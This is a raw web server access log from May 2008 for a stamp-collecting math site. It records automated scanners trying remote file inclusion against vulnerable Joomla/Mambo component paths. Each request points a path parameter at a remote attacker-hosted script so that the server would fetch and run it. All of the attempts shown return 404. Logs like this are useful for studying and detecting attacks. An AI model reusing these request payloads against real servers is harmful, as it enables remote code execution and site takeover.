201.12.151.34 - - [04/May/2008:20:44:58 -0700] "GET /logs//nav.php?g=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:48:31 -0700] "GET /logs/access_080331.log//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:48:31 -0700] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
208.112.43.2 - - [04/May/2008:20:48:32 -0700] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
196.40.71.237 - - [04/May/2008:20:53:32 -0700] "GET /logs/access_080331.log//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
196.40.71.237 - - [04/May/2008:20:53:33 -0700] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
196.40.71.237 - - [04/May/2008:20:53:33 -0700] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.mathstamps.com"
200.138.217.247 - - [04/May/2008:20:53:49 -0700] "GET /logs/access_080421.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.138.217.247 - - [04/May/2008:20:53:52 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.138.217.247 - - [04/May/2008:20:53:56 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.138.217.247 - - [04/May/2008:20:56:51 -0700] "GET /logs/access_080421.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.138.217.247 - - [04/May/2008:20:56:55 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.138.217.247 - - [04/May/2008:20:57:00 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.138.217.247 - - [04/May/2008:20:59:14 -0700] "GET /logs/access_080421.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.138.217.247 - - [04/May/2008:20:59:24 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.138.217.247 - - [04/May/2008:20:59:29 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.138.217.247 - - [04/May/2008:21:00:33 -0700] "GET /logs/access_080310.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.44.212.95 - - [04/May/2008:21:00:44 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.138.217.247 - - [04/May/2008:21:02:29 -0700] "GET /logs/access_080310.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.138.217.247 - - [04/May/2008:21:04:26 -0700] "GET /logs/access_080310.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.nameserver11.net/billing2/include/html/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.44.212.95 - - [04/May/2008:21:09:33 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.44.212.95 - - [04/May/2008:21:09:34 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.44.212.95 - - [04/May/2008:21:09:34 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
195.12.53.176 - - [04/May/2008:21:12:58 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.44.212.95 - - [04/May/2008:21:15:17 -0700] "GET /logs/access_080414.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.44.212.95 - - [04/May/2008:21:15:17 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
207.44.212.95 - - [04/May/2008:21:15:17 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
195.219.133.78 - - [04/May/2008:21:16:26 -0700] "GET /logs/access_080331.log//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.219.133.78 - - [04/May/2008:21:16:26 -0700] "GET //modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.219.133.78 - - [04/May/2008:21:16:27 -0700] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.15.205.17 - - [04/May/2008:21:17:46 -0700] "GET /logs/access_080421.log/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.205.17 - - [04/May/2008:21:17:47 -0700] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.205.17 - - [04/May/2008:21:17:48 -0700] "GET /logs/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.212.173.42 - - [04/May/2008:21:19:37 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.212.173.42 - - [04/May/2008:21:19:37 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
195.12.53.176 - - [04/May/2008:21:25:51 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.15.205.17 - - [04/May/2008:21:26:37 -0700] "GET /logs/access_080421.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.205.17 - - [04/May/2008:21:26:37 -0700] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.205.17 - - [04/May/2008:21:26:37 -0700] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.15.205.17 - - [04/May/2008:21:28:13 -0700] "GET /logs/access_080317.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
203.200.95.142 - - [04/May/2008:21:32:14 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.200.95.142 - - [04/May/2008:21:32:15 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.200.95.142 - - [04/May/2008:21:32:25 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.200.95.142 - - [04/May/2008:21:32:26 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.230.212.199 - - [04/May/2008:21:34:27 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.230.212.199 - - [04/May/2008:21:34:27 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.230.212.199 - - [04/May/2008:21:34:27 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
67.15.205.17 - - [04/May/2008:21:34:35 -0700] "GET /logs/access_080331.log/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.181.2.242 - - [04/May/2008:21:41:23 -0700] "GET /logs/access_080414.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tuningevasions.free.fr/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
200.181.2.242 - - [04/May/2008:21:41:24 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tuningevasions.free.fr/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
200.181.2.242 - - [04/May/2008:21:41:25 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tuningevasions.free.fr/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
66.230.212.199 - - [04/May/2008:21:52:12 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.230.212.199 - - [04/May/2008:21:52:12 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.230.212.199 - - [04/May/2008:21:52:12 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.230.212.199 - - [04/May/2008:21:52:12 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.230.212.199 - - [04/May/2008:21:52:29 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
66.230.212.199 - - [04/May/2008:21:52:29 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
216.6.180.69 - - [04/May/2008:21:52:49 -0700] "GET /logs/access_080317.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.6.180.69 - - [04/May/2008:21:52:49 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.6.180.69 - - [04/May/2008:21:52:50 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.6.180.69 - - [04/May/2008:21:52:55 -0700] "GET /logs/access_080414.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
72.32.68.172 - - [04/May/2008:21:53:22 -0700] "GET /logs/access_080317.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
72.32.68.172 - - [04/May/2008:21:53:22 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
72.32.68.172 - - [04/May/2008:21:53:22 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
72.32.68.172 - - [04/May/2008:21:53:26 -0700] "GET /logs/access_080414.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.195.51.99 - - [04/May/2008:22:03:27 -0700] "GET /logs/access_070903.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
89.108.93.123 - - [04/May/2008:22:04:19 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ipdf.kr/bbs//skin/do?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
89.108.93.123 - - [04/May/2008:22:04:21 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.ipdf.kr/bbs//skin/do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
201.6.123.99 - - [04/May/2008:22:10:37 -0700] "GET /logs/access_080414.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.6.123.99 - - [04/May/2008:22:10:39 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.6.123.99 - - [04/May/2008:22:10:41 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://tuningevasions.free.fr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
89.108.93.123 - - [04/May/2008:22:13:42 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ipdf.kr/bbs//skin/do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
89.108.93.123 - - [04/May/2008:22:13:42 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.ipdf.kr/bbs//skin/do?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.mathstamps.com"
66.79.164.130 - - [04/May/2008:22:35:15 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
66.79.164.130 - - [04/May/2008:22:35:15 -0700] "GET //skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
66.79.164.130 - - [04/May/2008:22:35:15 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.205.74.75 - - [04/May/2008:22:35:19 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.205.74.75 - - [04/May/2008:22:35:19 -0700] "GET //skin/zero_vote/error.php?dir=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.205.74.75 - - [04/May/2008:22:35:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.79.164.130 - - [04/May/2008:22:35:23 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.205.74.75 - - [04/May/2008:22:35:28 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
204.92.87.157 - - [04/May/2008:22:35:41 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.togosite.com/auction/phpAdsNew/readme.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
204.92.87.157 - - [04/May/2008:22:35:42 -0700] "GET //skin/zero_vote/error.php?dir=http://www.togosite.com/auction/phpAdsNew/readme.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
204.92.87.157 - - [04/May/2008:22:35:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.togosite.com/auction/phpAdsNew/readme.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
204.92.87.157 - - [04/May/2008:22:35:49 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.togosite.com/auction/phpAdsNew/readme.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
91.121.64.29 - - [04/May/2008:22:35:51 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
91.121.64.29 - - [04/May/2008:22:35:51 -0700] "GET //skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
91.121.64.29 - - [04/May/2008:22:35:52 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
91.121.64.29 - - [04/May/2008:22:35:53 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
91.121.64.29 - - [04/May/2008:22:35:54 -0700] "GET //skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
91.121.64.29 - - [04/May/2008:22:35:54 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
91.121.64.29 - - [04/May/2008:22:36:00 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
91.121.64.29 - - [04/May/2008:22:36:02 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
91.121.64.29 - - [04/May/2008:22:36:11 -0700] "GET //skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
91.121.64.29 - - [04/May/2008:22:36:11 -0700] "GET //skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
204.92.87.157 - - [04/May/2008:22:36:47 -0700] "GET //skin/zero_vote/error.php?dir=http://www.togosite.com/auction/phpAdsNew/readme.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.19.74.194 - - [04/May/2008:22:37:43 -0700] "GET /logs/access_080331.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.74.194 - - [04/May/2008:22:37:43 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.74.194 - - [04/May/2008:22:37:44 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://admin.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
166.70.232.131 - - [04/May/2008:22:37:44 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
166.70.232.131 - - [04/May/2008:22:37:45 -0700] "GET //skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
166.70.232.131 - - [04/May/2008:22:37:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
166.70.232.131 - - [04/May/2008:22:38:06 -0700] "GET /logs/access_080331.log//skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
66.79.164.130 - - [04/May/2008:22:38:24 -0700] "GET //skin/zero_vote/error.php?dir=http://www.olgunlar.com/mambots/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
